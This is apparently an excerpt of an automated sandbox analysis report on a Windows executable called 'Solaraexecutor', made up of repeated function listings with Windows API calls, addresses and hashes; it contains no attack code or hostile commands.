Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b2af935cb1c45525d177f289c8375ec4b7e26694301d460d3e8abf0da17db7fb
Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
Opcode Fuzzy Hash: b2af935cb1c45525d177f289c8375ec4b7e26694301d460d3e8abf0da17db7fb
Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2

Function 00D3E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9d1fcdc377fea2dac100d3cb4535220d0cfc14bc2bed79c2eb94740d5149b0aa
Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
Opcode Fuzzy Hash: 9d1fcdc377fea2dac100d3cb4535220d0cfc14bc2bed79c2eb94740d5149b0aa
Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2

Function 00D3E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58eb026611be39792f5b29788488e6873593f1716a98326873509714d555bd6e
Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
Opcode Fuzzy Hash: 58eb026611be39792f5b29788488e6873593f1716a98326873509714d555bd6e
Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2

Function 00D3E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 41698b11a4ac66483fb188a232f5649fe86614f9d40176b5c562a5c7e47da03d
Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
Opcode Fuzzy Hash: 41698b11a4ac66483fb188a232f5649fe86614f9d40176b5c562a5c7e47da03d
Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2

Function 00D3E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d84b584306c185f33ea0f96f01f5b4d4ae98a55808757b0464e25fba3225faa7
Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
Opcode Fuzzy Hash: d84b584306c185f33ea0f96f01f5b4d4ae98a55808757b0464e25fba3225faa7
Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2

Function 00D3E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E580

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb967410cbdb315b29b01a4162dbf1f6656fefa0b63e029dc0f83cc9619b4f1d
Instruction ID: 26f472a964b116ff21422915e892299454d9ae8a98328d3f2c4364c3cb51b64b
Opcode Fuzzy Hash: eb967410cbdb315b29b01a4162dbf1f6656fefa0b63e029dc0f83cc9619b4f1d
Instruction Fuzzy Hash: AAA022C2ABC222FC300822A02C03C3B030CC0C0F2AB30A82EFC02C00C0BC800C0C08B0

Function 00D3E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E580

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 24425f817a059f3903975516da11849a30337aeeda8df346a35292b5d9e33267
Instruction ID: 26f472a964b116ff21422915e892299454d9ae8a98328d3f2c4364c3cb51b64b
Opcode Fuzzy Hash: 24425f817a059f3903975516da11849a30337aeeda8df346a35292b5d9e33267
Instruction Fuzzy Hash: AAA022C2ABC222FC300822A02C03C3B030CC0C0F2AB30A82EFC02C00C0BC800C0C08B0

Function 00D3E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3af7ae3191d6791d15ba2c81fea186a2c4b9f2490d23228004e4cab31a26c808
Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
Opcode Fuzzy Hash: 3af7ae3191d6791d15ba2c81fea186a2c4b9f2490d23228004e4cab31a26c808
Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1

Function 00D3E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d822c6d2b0ee98062688af04019c031638b76c0b9e98710f1188e069ef60c056
Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
Opcode Fuzzy Hash: d822c6d2b0ee98062688af04019c031638b76c0b9e98710f1188e069ef60c056
Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1

Function 00D3E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 326c1c0a1b1c8c543c40e62799c6184da5367b95f85c7711ecc0125f2093c3d0
Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
Opcode Fuzzy Hash: 326c1c0a1b1c8c543c40e62799c6184da5367b95f85c7711ecc0125f2093c3d0
Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1

Function 00D3E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E580

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 702a46c3689ed956f88ba93b550d5820eef6613781a85594a3a52a8b207dff80
Instruction ID: fbd097e43eab35832096ba01b79944182cbb4b89dfde5e69db91a44ad06e7103
Opcode Fuzzy Hash: 702a46c3689ed956f88ba93b550d5820eef6613781a85594a3a52a8b207dff80
Instruction Fuzzy Hash: D5A011C2AA8220BC300822A02C02C3B030CC0C0B2AB30A22EFC00800C0A8800A0808B0

Function 00D3E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c5c790dca0c490c1c6e308c65f7cbfe269ba3565bf376c840764a12fdfd66b1
Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
Opcode Fuzzy Hash: 3c5c790dca0c490c1c6e308c65f7cbfe269ba3565bf376c840764a12fdfd66b1
Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1

Function 00D29F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00D2903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00D29F0C

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 327efdbb39b88d906d715a571bac65214abb15aa9b2858e942281df745e41fb4
Instruction ID: 3689a9fc65495929363e8b868f42fce914e278432765d31609c34917f97deeb1
Opcode Fuzzy Hash: 327efdbb39b88d906d715a571bac65214abb15aa9b2858e942281df745e41fb4
Instruction Fuzzy Hash: 74A0113008030A8A8E002B30CA0800E3B20EB20BC230002A8A00ACA0A2CB22880B8A20

Function 00D3AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00D3AE72,C:\Users\user\Desktop,00000000,00D6946A,00000006), ref: 00D3AC08

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 19f97476cafa38b3f2eb7894ea2fa87eec78cfa4355f09a66d9aac7fd6afe2ef
Instruction ID: 56dfe3249be80939e4a68b64b35566a10ddf30779b220ff029b46fffaaa64ce8
Opcode Fuzzy Hash: 19f97476cafa38b3f2eb7894ea2fa87eec78cfa4355f09a66d9aac7fd6afe2ef
Instruction Fuzzy Hash: FFA01130200B008B82000B328F0AA0EBAAAAFA2B82F00C028A800C0230CB30C820AA20

Function 00D29620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00D295D6,?,?,?,?,?,00D52641,000000FF), ref: 00D2963B

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6868e2e5784c82a8797ea7dd5bcc0841a520f337206b59289b9a645df451a4e6
Instruction ID: d69f068937ff6fe424d88ffa4af5a6eb354886e0a4cab2f831a63258e6b33bbb
Opcode Fuzzy Hash: 6868e2e5784c82a8797ea7dd5bcc0841a520f337206b59289b9a645df451a4e6
Instruction Fuzzy Hash: C2F0E930081B259FDB308A24D468792F7E8AB3232AF081B1ED0E2429E0D371658D9A60

Non-executed Functions

Function 00D3C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D3C2B1
EndDialog.USER32(?,00000006), ref: 00D3C2C4
GetDlgItem.USER32(?,0000006C), ref: 00D3C2E0
SetFocus.USER32(00000000), ref: 00D3C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00D3C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D3C358
FindFirstFileW.KERNEL32(?,?), ref: 00D3C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D3C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D3C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D3C3D4
_swprintf.LIBCMT ref: 00D3C404

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D3C417
FindClose.KERNEL32(00000000), ref: 00D3C41E
_swprintf.LIBCMT ref: 00D3C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00D3C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D3C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D3C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D3C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D3C509
_swprintf.LIBCMT ref: 00D3C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D3C548
_swprintf.LIBCMT ref: 00D3C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00D3C5AF

Part of subcall function 00D3AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D3AF35
Part of subcall function 00D3AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D5E72C,?,?), ref: 00D3AF84

Strings

REPLACEFILEDLG, xrefs: 00D3C247
%s %s %s, xrefs: 00D3C3F2, 00D3C527
%s %s, xrefs: 00D3C469, 00D3C58E

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 962c55a2fcddb09a52f8f746b0045e0e4bdaab900f33cea999feb8c71f36118a
Instruction ID: 2eea3125ff1f267efe1de4e8d8cca68c06a021df60e0e3fed79b8913d0afdbf4
